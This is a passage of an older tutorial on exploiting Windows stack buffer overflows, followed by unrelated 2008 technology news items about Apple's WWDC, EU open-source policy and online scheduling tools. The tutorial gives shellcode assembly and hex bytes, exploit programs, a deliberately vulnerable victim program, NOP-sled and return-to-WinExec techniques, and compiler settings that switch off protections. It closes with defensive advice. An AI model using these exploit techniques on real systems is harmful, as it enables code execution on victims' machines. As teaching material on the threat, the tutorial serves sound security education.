Writing shellcode is an art in itself. Since operating systems use different system function calls, an individual approach is needed, depending on the OS environment under which the code must run and the goal it aims at. In the simplest case nothing needs to be done: merely overwriting the return address causes the program to deviate from its expected behavior and fail. In fact, because buffer overflow flaws allow the attacker to execute arbitrary code, a whole range of activities can be developed, constrained only by the available space (although even this can be circumvented) and by access privileges. In most cases, a buffer overflow is a way for an attacker to gain "super user" privileges on the system or to use a vulnerable system to launch a denial-of-service attack. Let us try, for example, to create a shellcode that executes commands via the interpreter (cmd.exe in WinNT/2000). This can be attained using the standard API functions WinExec or CreateProcess. When WinExec is called, the call will look like this:

WinExec(command, state)

In terms of the activities that are necessary from our point of view, the following steps must be carried out:

- pushing the command to run onto the stack. It will be "cmd /c calc".

- pushing the second parameter of WinExec onto the stack. We assume it to be zero in this script.

- pushing the address of the command "cmd /c calc".

- calling WinExec.

There are many ways to accomplish this task, and the snippet below is only one possible trick:


sub esp, 28h ; 3 bytes

jmp calling ; 2 bytes

par:

call WinExec ; 5 bytes

push eax ; 1 byte

call ExitProcess ; 5 bytes

calling:

xor eax, eax ; 2 bytes

push eax ; 1 byte

call par ; 5 bytes

.string "cmd /c calc||" ; 13 bytes

Some comments on this:

sub esp, 28h

This instruction adds some room on the stack. Since the procedure containing the overflowed buffer has completed, the stack space allocated for its local variables is now considered unused due to the change in ESP. Consequently, any function call issued from our code is likely to overwrite the arduously constructed code we inserted in the buffer. To keep our data intact, we need to restore the stack pointer to its value from before the "garbage", i.e. move it back past our code (40 bytes), thereby assuring that our data will not be overwritten.

jmp calling

The next instruction jumps to the location where the WinExec function arguments are pushed onto the stack. Some attention must be paid here. Firstly, a NULL value must be produced and placed onto the stack: such an argument cannot be embedded directly in the code, since it would be interpreted as a NULL terminator and only part of the string would be copied. Next, we need a way of obtaining the address of the command to run, and we do this in a somewhat ad hoc manner. As we may remember, each time a function is called, the address following the CALL instruction is pushed onto the stack. In our code, the final CALL is immediately followed by the command string, so executing it pushes the string's address onto the stack for free. Subsequently WinExec, followed by ExitProcess, is run. The remaining detail is to compute the offset for the CALL. Fig. 3 below shows the structure of a shellcode accomplishing this task.

Fig. 3 A sample shellcode

Legend:

As can be seen, our example does not push the reference point, EBP, onto the stack. This is due to an assumption that the victim program was compiled with VC++ 7 at its default settings, which omit that operation. The remaining job is to put the code pieces together and test the whole. The above shellcode, incorporated into a C program as raw machine code, is presented in Listing 4.

Listing 4 – Exploit of a program victim.exe

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

char *victim = "victim.exe";

char *code = "\x90\x90\x90\x83\xec\x28\xeb\x0b\xe8\xe2\xa8\xd6\x77\x50\xe8\xc1\x90\xd6\x77\x33\xc0\x50\xe8\xed\xff\xff\xff";

char *oper = "cmd /c calc||";

char *rets = "\xc0\xfe\x12";

char par[42];

void main()

{

strncat(par, code, 28);

strncat(par, oper, 14);

strncat(par, rets, 4);

char *buf;

buf = (char*)malloc( strlen(victim) + strlen(par) + 4);

if (!buf)

{

printf("Error malloc");

return;

}

wsprintf(buf, "%s \"%s\"", victim, par);

printf("Calling: %s", buf);

WinExec(buf, 0);

}

Ooops, it works! The only requirement is that the compiled file victim.exe from Listing 3 is in the current directory. If all goes as expected, we will see a window with the well-known system Calculator.

Stack-based and non-stack-based exploits

In the previous example we presented our own code that is executed once control over the program has been seized. However, such an approach may not be applicable when the "victim" is able to check that no illegal code is being executed on the stack, stopping the program otherwise. Increasingly, so-called non-stack-based exploits are used instead. The idea is to call a system function directly by overwriting (nothing new!) the return address with the address of, for example, WinExec. The only remaining problem is to push the parameters used by the function onto the stack in a usable state. The exploit structure will then be as in Figure 4.

Fig. 4 A non-stack based exploit

Legend:

A non-stack-based exploit requires no instructions in the buffer, only the calling parameters of the function WinExec. Because a command terminated with a NULL character cannot be embedded, we use the character '|', which links multiple commands on a single command line; each successive command is executed only if the execution of the previous one has failed. This step is indispensable for terminating the command to run without executing the padding. After the padding, which only fills the buffer, we place the return address (ret) to overwrite the saved address with that of WinExec; furthermore, a dummy return address (R) is pushed to ensure a suitable stack layout. Since the WinExec function accepts any DWORD value for the display mode, we can let it use whatever happens to be on the stack. Thus only one of the two parameters remains, terminating the string.

In order to test this approach we need a victim program. It will be very similar to the previous one but with a considerably larger buffer (why? we will explain later). This program is called victim2.exe and is presented in Listing 5.

Listing 5 – A victim of a non-stack based exploit attack

#include <stdio.h>

#include <string.h>

#define BUF_LEN 1024

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argc > 1)

{

printf("\nBuffer length: %d\nParameter length: %d", BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

}

To exploit this program we need a piece given in Listing 6.

Listing 6 – Exploit of the program victim2.exe

#include <windows.h>

char* code = "victim2.exe \"cmd /c calc||AAAAA...AAAAA\xaf\xa7\xe9\x77\x90\x90\x90\x90\xe8\xfa\x12\"";

void main()

{

WinExec( code, 0 );

}

For simplicity's sake, a portion of the "A" characters inside the string has been deleted. The total length of the parameter string should be 1011 characters.

When the WinExec function returns, the program jumps to the dummy saved return address and consequently stops working. It will report an error, but by that time the command should already be doing its job.

Given this buffer size, one may ask why it is so large when the "malicious" code has become relatively small. Notice that with this approach we make use of the stack after the overflowed function has returned: once the procedure terminates, the stack top is restored to its original position, so the space holding our data (the local buffer, in fact) becomes free room for subsequent procedure calls, which may use it arbitrarily, most likely overwriting the saved data. Unlike in the previous exploit, there is no way to move the stack pointer out of the way manually, since we cannot execute any code of our own. For example, the WinExec function called at the very beginning occupies 84 bytes of stack and calls further functions that also place their data on the stack. We need a large buffer to keep our data out of their reach. Figure 5 illustrates this.

Fig. 5 A sample non-stack based exploit: stack usage

Legend:

This is just one possible solution among many alternatives. Its advantage is that it is easy to build, because no custom shellcode needs to be written. It is also immune to protections that use monitoring libraries to catch illegal code executing on the stack.

System function calls

Notice that all the system function calls discussed previously jump to a predetermined, fixed address in memory. This makes the code static and thus non-transferable across the various Windows operating environments. Why? Different Windows OSes use different user and kernel address layouts; the kernel base address differs, and so do the system function addresses. For details, see Table 1.

Table 1. Kernel addresses vs. OS environment

Windows Platform                Kernel Base Address
Win95                           0xBFF70000
Win98                           0xBFF70000
WinME                           0xBFF60000
WinNT (Service Pack 4 and 5)    0x77F00000
Win2000                         0x77F00000

To prove it, simply run our example under an operating system other than Windows NT/2000/XP.

What remedy would be appropriate? The key is to fetch function addresses dynamically, at the cost of a considerable increase in code length. It turns out to be sufficient to find the locations of two useful system functions, GetProcAddress and LoadLibraryA, and use them to obtain the address of any other function. For more details, see the references, particularly the Kungfoo project developed by Harmony [6].

Other ways of defining the beginning of the buffer

All the previous examples used a debugger to establish the beginning of the buffer. The problem is that we wanted to establish this address very precisely, which is not, in general, necessary. If the alternate code is placed somewhere in the middle of the buffer rather than at its beginning, and the space after the code is filled with many copies of the jump address, the return address will still be overwritten as required. Moreover, if we fill the buffer with a series of 0x90 bytes up to the beginning of the code, our chance of guessing a workable return address grows considerably. The buffer is then filled as illustrated in Figure 6.

Fig. 6 Using NOPs during an overflow attack

Legend:

The byte 0x90 is the NOP instruction, which does literally nothing. If the overwritten return address points at any of the NOPs, the program slides through them and eventually reaches the beginning of the shellcode. This is the trick that avoids a cumbersome search for the precise address of the beginning of the buffer.

Where does the risk lie?

Poor programming practices and software bugs are undoubtedly the risk factor. Typically at risk are programs that use text-string functions that perform no bounds checking. The standard C/C++ libraries are filled with such dangerous functions: strcpy(), strcat(), sprintf(), gets(), scanf(). If their target is a fixed-size buffer, a buffer overflow can occur when user input is read into it.

Another commonly encountered pattern is a loop that copies single characters obtained from the user or from a file. If the loop's exit condition depends only on the occurrence of a particular character, the situation is the same as above.

Preventing buffer overflow attacks

The most straightforward and effective solution to the buffer overflow problem is to employ secure coding practices. In addition, several commercial and free solutions are available that effectively stop most buffer overflow attacks. Two approaches are commonly employed:

- library-based defenses using re-implementations of the unsafe functions that ensure these functions can never write past the buffer size. An example is the Libsafe project.

- library-based defenses that detect any attempt to run illegitimate code on the stack. If a stack-smashing attack is attempted, the program responds by emitting an alert. This is the solution implemented in SecureStack, developed by SecureWave.

Another prevention technique is compiler-based runtime bounds checking, which has recently become available; hopefully, with time, the buffer overflow problem will cease to be a major headache for system administrators. While no security measure is perfect, avoiding programming errors is always the best solution.

Summary

Of course, there are plenty of interesting buffer overflow issues that have not been discussed. Our intention was to demonstrate the concept and bring certain problems to light. We hope this paper contributes to improving the quality of the software development process through a better understanding of the threat, and hence provides better security to all of us.

References

The links listed below form a small part of a huge number of references available on the World Wide Web.

[1] Aleph One, "Smashing The Stack For Fun and Profit", Phrack Magazine No. 49, http://www.phrack.org/show.php?p=49&a=14
[2] P. Fayolle, V. Glaume, "A Buffer Overflow Study: Attacks & Defenses", http://www.enseirb.fr/~glaume/indexen.html
[3] I. Simon, "A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks", http://www.mcs.csuhayward.edu/~simon/security/boflo.html
[4] Bulba and Kil3r, "Bypassing StackGuard and StackShield", Phrack Magazine No. 56, http://phrack.infonexus.com/search.phtml?view&article=p56-5
[5] Many interesting papers on buffer overflows and more: http://www.nextgenss.com/research.html#papers
[6] http://harmony.haxors.com/kungfoo
[7] http://www.research.avayalabs.com/project/libsafe/
[8] http://www.securewave.com/products/securestack/secure_stack.html

Endnotes:

{1} In practice, certain code-optimizing compilers may operate without pushing EBP onto the stack. The Visual C++ 7 compiler does this by default. To deactivate it, set Project Properties | C/C++ | Optimization | Omit Frame Pointer to NO.

{2} Microsoft introduced a buffer overrun security tool in Visual C++ 7. If you intend to run the above examples in this environment, ensure that this option is not selected before compilation: Project Properties | C/C++ | Code Generation | Buffer Security Check should be set to NO.


----------------------------------------------------------------------------------------------

Wednesday, June 11, 2008

Apple in Parallel: Turning the PC World Upside Down?

Steven P. Jobs, chief executive of Apple, at the company’s Worldwide Developers Conference on Monday. (Credit: Kimberly White/Reuters)

(Updated with more information at 1:45 p.m. EDT)

(Corrected OpenCL definition at 10:05 p.m. EDT)

At the outset of his presentation at the opening session of Apple’s Worldwide Developers Conference, Steve Jobs showed a slide of a stool with three legs to describe the company’s businesses: Macintosh, music and the iPhone.

The company is making another bet on parallelism, and the implications may be more profound than anyone yet realizes.

In describing the next version of the Mac OS X operating system, dubbed Snow Leopard, Mr. Jobs said Apple would focus principally on technology for the next generation of the industry’s increasingly parallel computer processors.

Today the personal computer industry is going through a wrenching change in trying to find a way to keep up with the speed increases that were the hallmark of the PC business until about five years ago. At that point, companies like Intel, I.B.M. and AMD had simply lived off their continual ability to increase the clock speeds of their microprocessors. But the industry hit a wall as chips reached the melting point.

As a consequence, the industry shifted gears and began making lower-power processors that added multiple C.P.U.’s. The idea was to gain speed by breaking up problems into multiple pieces and computing the parts simultaneously.

The problem is that, having headed down that path, the industry is now admitting that it doesn’t know how to program the new parallel chips efficiently when the number of cores goes above a handful.

On Monday, Mr. Jobs claimed that Apple is coming to the rescue.

“We’ve added over a thousand features to Mac OS X in the last five years,” he said Monday in an interview after his presentation. “We’re going to hit the pause button on new features.”

Instead, the company is going to focus on what he called “foundational features” that will be the basis for a future version of the operating system.

“The way the processor industry is going is to add more and more cores, but nobody knows how to program those things,” he said. “I mean, two, yeah; four, not really; eight, forget it.”

Apple, he claimed, has made a parallel-programming breakthrough.

It is all about the software, he said. Apple purchased a chip company, PA Semi, in April, but the heart of Snow Leopard will be about a parallel-programming technology that the company has code-named Grand Central.

“PA Semi is going to do system-on-chips for iPhones and iPods,” he said.

Grand Central will be at the heart of Snow Leopard, he said, and the shift in technology direction raises lots of fascinating questions, including what will happen to Apple’s partnership with Intel.

ADDED: Snow Leopard will also tap the computing power inherent in the graphics processors that are now used in tandem with microprocessors in almost all personal and mobile computers. Mr. Jobs described a new processing standard that Apple is proposing called OpenCL (Open Computing Language), which is intended to refocus graphics processors on standard computing functions.

“Basically it lets you use graphics processors to do computation,” he said. “It’s way beyond what Nvidia or anyone else has, and it’s really simple.”

Since Intel trails both Nvidia and AMD’s ATI graphics processor division, it may mean that future Apple computers will look very different in terms of hardware.

Just this week, for example, a machine at Los Alamos National Laboratory set the world supercomputer processing speed record. It was built largely from more than 12,000 I.B.M. Cell processors, originally designed for Sony's PS3 video-game console.

If Apple can use similar chips to power its future computers, it will change the computer industry.

EU pushes open-source standard as 'smart business'

Tuesday, June 10, 2008

By Associated Press

BRUSSELS, Belgium (AP) - The EU's top antitrust official called on member governments Tuesday to use open-source software, an apparent jab at Microsoft Corp.'s proprietary technology.

"No citizen or company should be forced or encouraged to choose a closed technology over an open one, through a government having made that choice first," European Competition Commissioner Neelie Kroes said at a conference organized by OpenForum Europe, a nonprofit group that advocates open standards.

Choosing technology formats that can be used by different vendors -- often without paying a fee -- is "a very smart business decision," Kroes said.

She said the European Commission would do its part when it picks software standards for its own use, saying "it must not rely on one vendor, it must not accept closed standards and it must refuse to become locked into a particular technology."

Her comments appeared to target Microsoft -- currently under EU investigation for a second time for possible antitrust violations. The company shunned an existing open format for archiving word processing documents backed by IBM and open source developers in favor of its own open version, Office Open XML, or OOXML.

Despite a chorus of complaints, OOXML was approved in April as an international standard. That paved the way for OOXML to be picked up by the IT departments of governments and large corporations -- although the approval is on hold while protests are resolved.

Critics of OOXML claim it locks out competitors, giving Microsoft customers no choice but to keep buying Microsoft programs forever.

"We need to be aware of the long-term costs of lock-in: you are often locked-in to subsequent generations of that technology," she said. "There can also be spillover effects where you get locked in to other products and services provided by that vendor."

Kroes said an industry should not rush to set standards that all rivals needed to follow. And companies that hold key patents should be clear about the royalties they would charge if their patent becomes part of a standard, she said.

A Self-Writing To-Do List

Wednesday, June 11, 2008

New online schedulers rely on natural-language processing to take the drudgery out of getting organized.

By Lissa Harris

The problem with to-do lists and schedules is that you need to fill them out. Now, a new generation of free online schedulers promises to end that drudgery. These new Web applications use natural-language processing to interpret spoken commands and ordinary written sentences to build calendars and personal organizers.

Perhaps the simplest of the new generation of schedulers is Presdo, based in San Francisco, which launched in late April to help users collaborate to schedule meetings and other events. Borrowing from Google's successful bag of tricks, Presdo's home page is as simple as it gets: just a floating text box. Type in "have brunch with Margaret on Sunday," and Presdo translates your command into data, bringing you to a page where you and your guests can check and tweak the details of your event.

By taking its cues from the ways that people naturally talk about time, the software frees users to be general about dates and times, says Presdo founder Eric Ly. Imprecise phrases like "next month," which would be impossible to put on a calendar without picking a particular date and time, are allowed to stay fluid for as long as the user wants them to.

Credit: Technology Review

"There's no widget in our system that looks anything like a calendar, and that was intentional," says Ly. "We really wanted to make it very easy for people to express what they wanted in terms of time. We felt like the natural-language approach was going to be more flexible and expressive for users." If you sign up as a regular user, Presdo will gather more information to help it guess automatically. For example, it will suggest restaurants near where you live via Google Maps, or it will remember Margaret's e-mail address from your last event together.

But translating the vagaries of ordinary speech into data that a computer can understand is a tough technical problem. "One thing this made me acutely aware of is how weirdly people speak," says Rael Dornfest, developer of IWantSandy, an online personal-assistant program based in Portland, Oregon, that uses simple text-based interactions to generate calendar items, to-do lists, and reminders. "There are little things that are sort of classic. When I say 'next week,' do I mean the week upcoming or the week after that? The problem is not about parsing. It's that if you said it to 15 people, half would interpret it one way, and half the other way."

Sandy--named after free-software advocate Tim O'Reilly's real-life personal assistant--can intelligently read e-mails, text messages, and Twitter feeds. Dornfest calls Sandy's algorithm "natural-language-ish processing": it's basically English, with a few keywords to help Sandy recognize common tasks. Telling her to "remind" or "remember" something generates an automatic e-mail or text-message reminder; adding "@todo" to your message places it on your to-do list.

By using ubiquitous communication tools like e-mail and text messaging to interact with Sandy, says Dornfest, users can get organized without stopping to think too hard about it. "A lot of the things Sandy takes down would never have made it into a calendar in your lifetime--it's just too painful," he says. "Most organizational systems break your flow. They try to make you do something else for a moment, and then you can go back to whatever you were doing in the first place."

Another new program, reQall--developed by QTech, based in Hyderabad, India--pushes that idea even further by giving users a toll-free number they can call to leave messages. Whatever your favorite communication medium--e-mail, Web, text messaging, or phone--odds are that reQall can parse it. Voice-recognition software, live human transcriptionists, and natural-language-processing algorithms read your messages and use them to generate reminders, delivered by e-mail, text message, or voice call and customized for the user.

"If I say, 'Remember to buy a watermelon tomorrow,' I won't see it today," says QTech founder Sunil Vemuri, who got the idea for the program while a PhD student researching memory at MIT's Media Lab. "The system will interpret the sentence and put it in the right place. It removes some of the cognitive burdens of trying to get the idea out and organize it."

Neither Presdo, IWantSandy, nor reQall has an obvious business model. Their creators are contemplating charging fees for premium accounts in the future, but for now, all three applications are free of charge.

The sudden popularity of organizers that are just a text message away may be part of a larger trend. For two decades, software has been dominated by graphical user interfaces, which employ visual features like windows and icons to convey information. But clearly, Google isn't the only company that's banking on text entry. The command line is making a comeback--and increasingly, natural-language processing is bringing the ease and simplicity of text-based computing to the non-tech-savvy.

"There are going to be more and more applications which are less monolithic screens, and more dashing off quick missives," says Dornfest. "We've just begun to scratch the surface here."

Tuesday, June 10, 2008

Apple Updates iPhone, Slashes Price

Steve Jobs, Apple's CEO, confirms rumors that a cheaper iPhone with GPS will be available in July.

By Kate Greene

Monday, June 09, 2008

As at any Apple event, attendees of the World Wide Developers Conference in San Francisco showed up on Monday expecting to be awed by a Steve Jobs Show. And judging from the elevated mood in the room immediately after the Apple CEO's presentation, they were. The biggest technical news, which was widely predicted, is that the new iPhone, available July 11, will operate over so-called 3G networks, which are many times faster than the EDGE networks that the iPhone currently uses. Also confirmed was the rumor of GPS for real-time location tracking on the iPhone. But perhaps the most crowd-pleasing announcement is the dramatic price cut: from $399 for an eight-gigabyte model to $199. A 16-gigabyte model will be $299 and available in black and white.

When the iPhone was introduced last June, some analysts predicted that consumers would reject it because of its hefty price tag and its reliance on AT&T's relatively slow network. Since the phone's release, roughly six million iPhones have been sold to people who have looked past sluggish downloads and fallen in love with the gadget's intuitive touch interface and impressive graphics. But the difference between the EDGE and 3G networks can be startling. During his presentation, Jobs contrasted the two versions of the phone. It takes 59 seconds for the current phone to load a Web page with heavy graphics. On the new 3G phone, the same page loads in 21 seconds. By comparison, it takes 17 seconds on a Wi-Fi network. E-mail downloads are 3.6 times faster.

By adding GPS, Apple has taken an important step toward expanding location-based services--tools that people use to find friends and activities around them in real time. Today's iPhone has the ability to locate itself, within a relatively large radius, using signals from cell-phone towers and Wi-Fi stations. GPS takes it a step farther, pinpointing location down to a couple of meters. This enables real-time tracking, making the iPhone a useful in-car navigation tool.

Jobs also provided an update of the third-party software, available in the forthcoming iPhone application store, and updates on the phone's compatibility with enterprise software. As announced in March, the iPhone will support Microsoft Exchange, providing compatibility with Outlook's mail, contacts, and calendar. The iPhone will also support Apple's iWork collection of productivity software, as well as Microsoft Office. And importantly, it will include the security features that have convinced enterprise customers--including the U.S. military and a number of Fortune 500 companies, law firms, and pharmaceutical companies--that the iPhone is as secure as any mobile device.

Credit: Technology Review

Since March, when the iPhone software developer kit was launched, a number of third-party companies and individual programmers have been racing to develop applications that run on the phone. At the conference, Apple highlighted a handful. Game developers are excited about the potential for using the built-in accelerometers as game controllers, and Sega showed off its Super Monkey Ball game. Loopt, a location-based startup that has previously only run on Sprint and Boost Mobile phones, demonstrated how a person using its service could find nearby friends. Typepad, a popular blogging tool, will offer software that enables easy mobile blogging on the iPhone.

In addition to the iPhone upgrades and previews of third-party software, Apple announced that it has revamped .Mac, its $99-a-year service that provides e-mail, a Web page, and syncing options. Rebranded as MobileMe, it will keep mail, calendar updates, and address-book changes constantly synchronized across Macs, PCs, and iPhones. The move shows that Apple is finally ready to recognize the importance of cloud computing, famously the province of Google and other Internet companies. However, since it is a pay service, it's unclear how much traction Apple will gain as it competes with popular free services such as Gmail and Yahoo's Flickr.

As with all Steve Jobs keynotes, bullet points were big, and technical details were scarce. However, in the coming weeks, and after the iPhone's release on July 11, more information is expected to emerge. Some experts were predicting an upgrade to the phone's camera, but on Monday, there was no mention of a camera update or added video capabilities.